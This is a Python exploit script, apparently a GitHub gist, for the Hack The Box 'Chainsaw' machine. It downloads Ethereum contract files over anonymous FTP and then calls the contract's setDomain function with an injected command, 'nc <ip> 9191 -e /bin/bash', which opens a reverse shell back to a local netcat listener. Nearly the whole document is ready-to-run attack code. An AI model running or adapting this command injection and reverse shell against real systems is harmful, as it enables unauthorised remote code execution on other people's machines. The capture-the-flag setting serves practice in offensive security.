#!/usr/bin/python3 | |
# -*- coding: utf-8 -*- | |
import json, subprocess | |
import netifaces as ni | |
from web3 import Web3 | |
from sys import exit | |
import os, ftplib | |
# TODO: Modify accordingly | |
TARGET_IP = '10.10.10.142' | |
NET_IFACE = 'tun0' | |
def run_exploit(ip): | |
# Store Ethereum contract address | |
caddress = open('address.txt', 'r').read() | |
caddress = caddress.replace('\n', '') | |
# Load Ethereum contract configuration | |
with open('WeaponizedPing.json') as f: | |
contractData = json.load(f) | |
# Establish a connection with the Ethereum RPC interface | |
w3 = Web3(Web3.HTTPProvider('http://{}:9810'.format(TARGET_IP))) | |
w3.eth.defaultAccount = w3.eth.accounts[0] | |
# Get Application Binary Interface (ABI) and Ethereum bytecode | |
Url = w3.eth.contract(abi=contractData['abi'], bytecode=contractData['bytecode']) | |
contractInstance = w3.eth.contract(address=caddress, abi=contractData['abi']) | |
# Calling the function of contract to set a new domain | |
url = contractInstance.functions.setDomain('hackthebox.eu | nc {} 9191 -e /bin/bash'.format(ip)).transact() | |
# Start netcat handler for reverse shell | |
try: | |
subprocess.call(['nc -lvnp 9191'], shell=True, stderr=subprocess.STDOUT) | |
except: | |
print('[*] Quitting netcat...') | |
def getFiles(): | |
ftp = ftplib.FTP(TARGET_IP) | |
ftp.login('anonymous', 'chainsaw') | |
filenames = ftp.nlst() | |
for filename in filenames: | |
if os.path.exists(filename): | |
os.remove(filename) | |
file = open(filename, 'wb') | |
ftp.retrbinary('RETR '+ filename, file.write) | |
file.close() | |
ftp.quit() | |
if __name__ == '__main__': | |
try: | |
ni.ifaddresses(NET_IFACE) | |
ip = ni.ifaddresses(NET_IFACE)[ni.AF_INET][0]['addr'] | |
except: | |
print('[*] Failed to fetch local IP address. Exiting...') | |
exit() | |
getFiles() | |
run_exploit(ip) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment